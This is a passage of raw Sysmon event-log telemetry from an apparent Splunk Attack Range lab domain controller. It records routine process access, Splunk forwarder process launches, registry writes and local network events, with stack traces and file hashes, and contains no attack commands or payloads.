12:24:46.885{42DC5269-D4CE-6086-F004-00000000BA01}20521500C:\Windows\System32\rdpclip.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+5337a|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441260Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.862{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-028E-6088-CC28-00000000BA01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441259Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.861{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BDDE33AF74B7B30B0817690B2EA34EC6,SHA256=7706998EB6EFFA26DA471F92D35DD1961488FB2111CE84F6043736CB96369170,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441258Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.860{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441257Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.860{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441256Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.860{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441255Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.859{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441254Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.859{42DC5269-CE96-6086-0500-00000000BA01}412368C:\Windows\system32\csrss.exe{42DC5269-028E-6088-CC28-00000000BA01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000441253Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.859{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-028E-6088-CC28-00000000BA01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000441252Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.859{42DC5269-028E-6088-CC28-00000000BA01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000441251Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.838{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7312BCFDC4AE2A7215ADF1B13A9914D2,SHA256=37D473A6DD1A2C77D86EAF1ADDAE77B0FDC45EE14310F6C6A0EC1BFBE28C3AF0,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000441250Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.localT1122SetValue2021-04-27 12:24:46.783{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exeHKCR\WOW6432Node\CLSID\{581C6708-9AF3-45F6-810F-6C7447E699B8}\InProcServer32\(Default)%%SystemRoot%%\system32\shdocvw.dll 13241300x8000000000000000441249Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.localT1122SetValue2021-04-27 12:24:46.782{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exeHKCR\CLSID\{581C6708-9AF3-45F6-810F-6C7447E699B8}\InProcServer32\(Default)%%SystemRoot%%\system32\shdocvw.dll 10341000x8000000000000000441248Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.703{42DC5269-D4CE-6086-F004-00000000BA01}20521500C:\Windows\System32\rdpclip.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5342e|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441247Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.702{42DC5269-D4CE-6086-F004-00000000BA01}20521500C:\Windows\System32\rdpclip.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+53398|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441246Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.702{42DC5269-D4CE-6086-F004-00000000BA01}20521500C:\Windows\System32\rdpclip.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+5337a|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000441245Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.702{42DC5269-D4CE-6086-F004-00000000BA01}20521500C:\Windows\System32\rdpclip.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+5337a|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000441244Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.785{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:58d1:a163:879d:ffff-63584-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000441243Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.785{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local63584-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000441242Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.784{42DC5269-CE8E-6086-0100-00000000BA01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-137netbios-nsfalse10.0.1.14win-dc-932.attackrange.local137netbios-ns 354300x8000000000000000441241Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.784{42DC5269-CE8E-6086-0100-00000000BA01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-932.attackrange.local137netbios-nsfalse10.0.1.255-137netbios-ns 354300x8000000000000000441240Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.784{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local50353- 10341000x8000000000000000441239Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.218{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-028E-6088-CB28-00000000BA01}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441238Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.217{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441237Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.217{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441236Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.216{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441235Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.216{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441234Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.216{42DC5269-CE96-6086-0500-00000000BA01}412528C:\Windows\system32\csrss.exe{42DC5269-028E-6088-CB28-00000000BA01}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000441233Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.216{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-028E-6088-CB28-00000000BA01}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000441232Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.216{42DC5269-028E-6088-CB28-00000000BA01}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000441231Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.213{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441230Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.213{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441279Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:47.915{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 